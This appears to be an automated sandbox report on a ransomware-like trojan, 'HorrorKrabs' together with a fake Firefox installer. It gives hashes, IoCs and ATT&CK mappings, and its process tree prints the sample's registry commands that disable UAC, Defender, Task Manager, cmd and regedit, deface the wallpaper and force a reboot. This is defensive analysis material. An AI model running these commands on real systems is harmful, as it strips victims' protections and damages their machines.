a635bcbe92a0ce6e34d87e8e8685b2b193a5f9f9ef57d52380464add95d511f3

Resubmissions

02/05/2024, 19:24

240502-x4p9xsec8w 4

02/05/2024, 19:18

240502-x1d3gsgc23 10

Analysis

max time kernel
185s
max time network
186s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
02/05/2024, 19:18

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

sample.html
Size

19KB
MD5

254a49b8e340c86d345b3613bc6427b1
SHA1

881475b7753f560b181e3a02072af552d257e3c0
SHA256

a635bcbe92a0ce6e34d87e8e8685b2b193a5f9f9ef57d52380464add95d511f3
SHA512

6ab6fa4994a7b46c3f09aabab4c62960e1abe1ad3efbf627a33b1e4822a2c187d8021508e8f8e07936d0d5f4b15cac12a74679852ba2584554de3ca1304b2cd0
SSDEEP

384:raN579vDpmReVoOs4ni9ylKeGMpU8Hhhb1DM7DS2LjMrSA+xzIJCgMmVn:raD9vBVoOs4nmyI1M9BhbJ6TMrSfsJ2Y

Score

10^/10

evasion ransomware trojan upx

Malware Config

Signatures

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Disables RegEdit via registry modification 2 IoCs

evasion

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "0"	HorrorKrabs.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	reg.exe

Disables Task Manager via registry modification
evasion

Disables cmd.exe use via registry modification 2 IoCs

evasion

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD = "0"	HorrorKrabs.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD = "1"	reg.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Control Panel\International\Geo\Nation	Firefox 21.3.7 Setup.exe

Executes dropped EXE 2 IoCs

pid	Process
2684	Firefox 21.3.7 Setup.exe
508	papaj.exe

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0009000000023502-506.dat	upx
behavioral1/memory/2684-527-0x0000000000400000-0x0000000000449000-memory.dmp	upx
behavioral1/memory/2684-539-0x0000000000400000-0x0000000000449000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
110	raw.githubusercontent.com
111	raw.githubusercontent.com

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Control Panel\Desktop\Wallpaper = "c:\\windows\\update32\\bg.bmp"	reg.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\update32\bg.bmp	cmd.exe
File opened for modification	C:\Windows\update32\bg.bmp	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 17 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133591512689960543"	chrome.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "156"	LogonUI.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings	chrome.exe

Modifies registry key 1 TTPs 6 IoCs

Modify Registry

T1112

pid	Process
4128	reg.exe
628	reg.exe
916	reg.exe
4716	reg.exe
3968	reg.exe
3876	reg.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
3712	chrome.exe
3712	chrome.exe
4692	chrome.exe
4692	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

pid	Process
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3712	chrome.exe
Token: SeCreatePagefilePrivilege	3712	chrome.exe
Token: SeShutdownPrivilege	3712	chrome.exe
Token: SeCreatePagefilePrivilege	3712	chrome.exe
Token: SeShutdownPrivilege	3712	chrome.exe
Token: SeCreatePagefilePrivilege	3712	chrome.exe
Token: SeShutdownPrivilege	3712	chrome.exe
Token: SeCreatePagefilePrivilege	3712	chrome.exe
Token: SeShutdownPrivilege	3712	chrome.exe
Token: SeCreatePagefilePrivilege	3712	chrome.exe
Token: SeShutdownPrivilege	3712	chrome.exe
Token: SeCreatePagefilePrivilege	3712	chrome.exe
Token: SeShutdownPrivilege	3712	chrome.exe
Token: SeCreatePagefilePrivilege	3712	chrome.exe
Token: SeShutdownPrivilege	3712	chrome.exe
Token: SeCreatePagefilePrivilege	3712	chrome.exe
Token: SeShutdownPrivilege	3712	chrome.exe
Token: SeCreatePagefilePrivilege	3712	chrome.exe
Token: SeShutdownPrivilege	3712	chrome.exe
Token: SeCreatePagefilePrivilege	3712	chrome.exe
Token: SeShutdownPrivilege	3712	chrome.exe
Token: SeCreatePagefilePrivilege	3712	chrome.exe
Token: SeShutdownPrivilege	3712	chrome.exe
Token: SeCreatePagefilePrivilege	3712	chrome.exe
Token: SeShutdownPrivilege	3712	chrome.exe
Token: SeCreatePagefilePrivilege	3712	chrome.exe
Token: SeShutdownPrivilege	3712	chrome.exe
Token: SeCreatePagefilePrivilege	3712	chrome.exe
Token: SeShutdownPrivilege	3712	chrome.exe
Token: SeCreatePagefilePrivilege	3712	chrome.exe
Token: SeShutdownPrivilege	3712	chrome.exe
Token: SeCreatePagefilePrivilege	3712	chrome.exe
Token: SeShutdownPrivilege	3712	chrome.exe
Token: SeCreatePagefilePrivilege	3712	chrome.exe
Token: SeShutdownPrivilege	3712	chrome.exe
Token: SeCreatePagefilePrivilege	3712	chrome.exe
Token: SeShutdownPrivilege	3712	chrome.exe
Token: SeCreatePagefilePrivilege	3712	chrome.exe
Token: SeShutdownPrivilege	3712	chrome.exe
Token: SeCreatePagefilePrivilege	3712	chrome.exe
Token: SeShutdownPrivilege	3712	chrome.exe
Token: SeCreatePagefilePrivilege	3712	chrome.exe
Token: SeShutdownPrivilege	3712	chrome.exe
Token: SeCreatePagefilePrivilege	3712	chrome.exe
Token: SeShutdownPrivilege	3712	chrome.exe
Token: SeCreatePagefilePrivilege	3712	chrome.exe
Token: SeShutdownPrivilege	3712	chrome.exe
Token: SeCreatePagefilePrivilege	3712	chrome.exe
Token: SeShutdownPrivilege	3712	chrome.exe
Token: SeCreatePagefilePrivilege	3712	chrome.exe
Token: SeShutdownPrivilege	3712	chrome.exe
Token: SeCreatePagefilePrivilege	3712	chrome.exe
Token: SeShutdownPrivilege	3712	chrome.exe
Token: SeCreatePagefilePrivilege	3712	chrome.exe
Token: SeShutdownPrivilege	3712	chrome.exe
Token: SeCreatePagefilePrivilege	3712	chrome.exe
Token: SeShutdownPrivilege	3712	chrome.exe
Token: SeCreatePagefilePrivilege	3712	chrome.exe
Token: SeShutdownPrivilege	3712	chrome.exe
Token: SeCreatePagefilePrivilege	3712	chrome.exe
Token: SeShutdownPrivilege	3712	chrome.exe
Token: SeCreatePagefilePrivilege	3712	chrome.exe
Token: SeShutdownPrivilege	3712	chrome.exe
Token: SeCreatePagefilePrivilege	3712	chrome.exe

Suspicious use of FindShellTrayWindow 49 IoCs

pid	Process
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe

Suspicious use of SendNotifyMessage 32 IoCs

pid	Process
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe
3712	chrome.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4584	LogonUI.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3712 wrote to memory of 3796	3712	chrome.exe	84
PID 3712 wrote to memory of 3796	3712	chrome.exe	84
PID 3712 wrote to memory of 4104	3712	chrome.exe	87
PID 3712 wrote to memory of 4104	3712	chrome.exe	87
PID 3712 wrote to memory of 4104	3712	chrome.exe	87
PID 3712 wrote to memory of 4104	3712	chrome.exe	87
PID 3712 wrote to memory of 4104	3712	chrome.exe	87
PID 3712 wrote to memory of 4104	3712	chrome.exe	87
PID 3712 wrote to memory of 4104	3712	chrome.exe	87
PID 3712 wrote to memory of 4104	3712	chrome.exe	87
PID 3712 wrote to memory of 4104	3712	chrome.exe	87
PID 3712 wrote to memory of 4104	3712	chrome.exe	87
PID 3712 wrote to memory of 4104	3712	chrome.exe	87
PID 3712 wrote to memory of 4104	3712	chrome.exe	87
PID 3712 wrote to memory of 4104	3712	chrome.exe	87
PID 3712 wrote to memory of 4104	3712	chrome.exe	87
PID 3712 wrote to memory of 4104	3712	chrome.exe	87
PID 3712 wrote to memory of 4104	3712	chrome.exe	87
PID 3712 wrote to memory of 4104	3712	chrome.exe	87
PID 3712 wrote to memory of 4104	3712	chrome.exe	87
PID 3712 wrote to memory of 4104	3712	chrome.exe	87
PID 3712 wrote to memory of 4104	3712	chrome.exe	87
PID 3712 wrote to memory of 4104	3712	chrome.exe	87
PID 3712 wrote to memory of 4104	3712	chrome.exe	87
PID 3712 wrote to memory of 4104	3712	chrome.exe	87
PID 3712 wrote to memory of 4104	3712	chrome.exe	87
PID 3712 wrote to memory of 4104	3712	chrome.exe	87
PID 3712 wrote to memory of 4104	3712	chrome.exe	87
PID 3712 wrote to memory of 4104	3712	chrome.exe	87
PID 3712 wrote to memory of 4104	3712	chrome.exe	87
PID 3712 wrote to memory of 4104	3712	chrome.exe	87
PID 3712 wrote to memory of 4104	3712	chrome.exe	87
PID 3712 wrote to memory of 4104	3712	chrome.exe	87
PID 3712 wrote to memory of 3648	3712	chrome.exe	88
PID 3712 wrote to memory of 3648	3712	chrome.exe	88
PID 3712 wrote to memory of 4700	3712	chrome.exe	89
PID 3712 wrote to memory of 4700	3712	chrome.exe	89
PID 3712 wrote to memory of 4700	3712	chrome.exe	89
PID 3712 wrote to memory of 4700	3712	chrome.exe	89
PID 3712 wrote to memory of 4700	3712	chrome.exe	89
PID 3712 wrote to memory of 4700	3712	chrome.exe	89
PID 3712 wrote to memory of 4700	3712	chrome.exe	89
PID 3712 wrote to memory of 4700	3712	chrome.exe	89
PID 3712 wrote to memory of 4700	3712	chrome.exe	89
PID 3712 wrote to memory of 4700	3712	chrome.exe	89
PID 3712 wrote to memory of 4700	3712	chrome.exe	89
PID 3712 wrote to memory of 4700	3712	chrome.exe	89
PID 3712 wrote to memory of 4700	3712	chrome.exe	89
PID 3712 wrote to memory of 4700	3712	chrome.exe	89
PID 3712 wrote to memory of 4700	3712	chrome.exe	89
PID 3712 wrote to memory of 4700	3712	chrome.exe	89
PID 3712 wrote to memory of 4700	3712	chrome.exe	89
PID 3712 wrote to memory of 4700	3712	chrome.exe	89
PID 3712 wrote to memory of 4700	3712	chrome.exe	89
PID 3712 wrote to memory of 4700	3712	chrome.exe	89
PID 3712 wrote to memory of 4700	3712	chrome.exe	89
PID 3712 wrote to memory of 4700	3712	chrome.exe	89
PID 3712 wrote to memory of 4700	3712	chrome.exe	89
PID 3712 wrote to memory of 4700	3712	chrome.exe	89
PID 3712 wrote to memory of 4700	3712	chrome.exe	89
PID 3712 wrote to memory of 4700	3712	chrome.exe	89
PID 3712 wrote to memory of 4700	3712	chrome.exe	89
PID 3712 wrote to memory of 4700	3712	chrome.exe	89
PID 3712 wrote to memory of 4700	3712	chrome.exe	89

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument C:\Users\Admin\AppData\Local\Temp\sample.html
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3712
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xb4,0x108,0x7ffd8cfeab58,0x7ffd8cfeab68,0x7ffd8cfeab78
  2⤵
  PID:3796
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1608 --field-trial-handle=1900,i,12580165221304903883,10426955054644166387,131072 /prefetch:2
  2⤵
  PID:4104
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1900,i,12580165221304903883,10426955054644166387,131072 /prefetch:8
  2⤵
  PID:3648
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2196 --field-trial-handle=1900,i,12580165221304903883,10426955054644166387,131072 /prefetch:8
  2⤵
  PID:4700
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2192 --field-trial-handle=1900,i,12580165221304903883,10426955054644166387,131072 /prefetch:1
  2⤵
  PID:1704
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3180 --field-trial-handle=1900,i,12580165221304903883,10426955054644166387,131072 /prefetch:1
  2⤵
  PID:636
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4396 --field-trial-handle=1900,i,12580165221304903883,10426955054644166387,131072 /prefetch:8
  2⤵
  PID:1464
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4264 --field-trial-handle=1900,i,12580165221304903883,10426955054644166387,131072 /prefetch:8
  2⤵
  PID:3872
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=4272 --field-trial-handle=1900,i,12580165221304903883,10426955054644166387,131072 /prefetch:1
  2⤵
  PID:2152
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=3308 --field-trial-handle=1900,i,12580165221304903883,10426955054644166387,131072 /prefetch:1
  2⤵
  PID:2388
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3224 --field-trial-handle=1900,i,12580165221304903883,10426955054644166387,131072 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4692
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4924 --field-trial-handle=1900,i,12580165221304903883,10426955054644166387,131072 /prefetch:8
  2⤵
  PID:452
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3192 --field-trial-handle=1900,i,12580165221304903883,10426955054644166387,131072 /prefetch:8
  2⤵
  PID:3064
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4244 --field-trial-handle=1900,i,12580165221304903883,10426955054644166387,131072 /prefetch:8
  2⤵
  PID:2300
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4904 --field-trial-handle=1900,i,12580165221304903883,10426955054644166387,131072 /prefetch:8
  2⤵
  PID:4704
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5152 --field-trial-handle=1900,i,12580165221304903883,10426955054644166387,131072 /prefetch:8
  2⤵
  PID:1316
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5216 --field-trial-handle=1900,i,12580165221304903883,10426955054644166387,131072 /prefetch:8
  2⤵
  PID:1568
- C:\Users\Admin\Downloads\Firefox 21.3.7 Setup.exe
  "C:\Users\Admin\Downloads\Firefox 21.3.7 Setup.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:2684
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7574.tmp\Firefox2137.cmd" "
    3⤵
    PID:5040
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
      4⤵
      Modifies registry key
      PID:3876
  - - C:\Users\Admin\AppData\Local\Temp\7574.tmp\papaj.exe
      papaj.exe
      4⤵
      Executes dropped EXE
      PID:508
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4912 --field-trial-handle=1900,i,12580165221304903883,10426955054644166387,131072 /prefetch:8
  2⤵
  PID:3432
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5360 --field-trial-handle=1900,i,12580165221304903883,10426955054644166387,131072 /prefetch:8
  2⤵
  PID:4392

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
1⤵
PID:4716

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:664

C:\Users\Admin\AppData\Local\Temp\Temp1_HorrorKrabs.zip\HorrorKrabs.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_HorrorKrabs.zip\HorrorKrabs.exe"
1⤵
- Disables RegEdit via registry modification
- Disables cmd.exe use via registry modification
PID:2608
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\krabsetup.bat" "
  2⤵
  - Drops file in Windows directory
  PID:4984
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\windows\update32\bg.bmp /f
    3⤵
    - Sets desktop wallpaper using registry
    PID:3220
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:424
- - C:\Windows\SysWOW64\reg.exe
    reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:4128
- - C:\Windows\SysWOW64\reg.exe
    reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    - UAC bypass
    - Modifies registry key
    PID:628
- - C:\Windows\SysWOW64\reg.exe
    Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:4204
- - C:\Windows\SysWOW64\reg.exe
    REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:916
- - C:\Windows\SysWOW64\net.exe
    net user Admin /fullname:"MR KRABS WAS HERE!"
    3⤵
    PID:4544
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 user Admin /fullname:"MR KRABS WAS HERE!"
      4⤵
      PID:1196
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d "1" /f
    3⤵
    PID:2508
- - C:\Windows\SysWOW64\reg.exe
    REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableCMD /t REG_DWORD /d 1 /f
    3⤵
    - Disables cmd.exe use via registry modification
    - Modifies registry key
    PID:4716
- - C:\Windows\SysWOW64\reg.exe
    REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
    3⤵
    - Disables RegEdit via registry modification
    - Modifies registry key
    PID:3968
- - C:\Windows\SysWOW64\shutdown.exe
    shutdown /r /t 00
    3⤵
    PID:2672

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa397b855 /state1:0x41c64e6d
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:4584

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

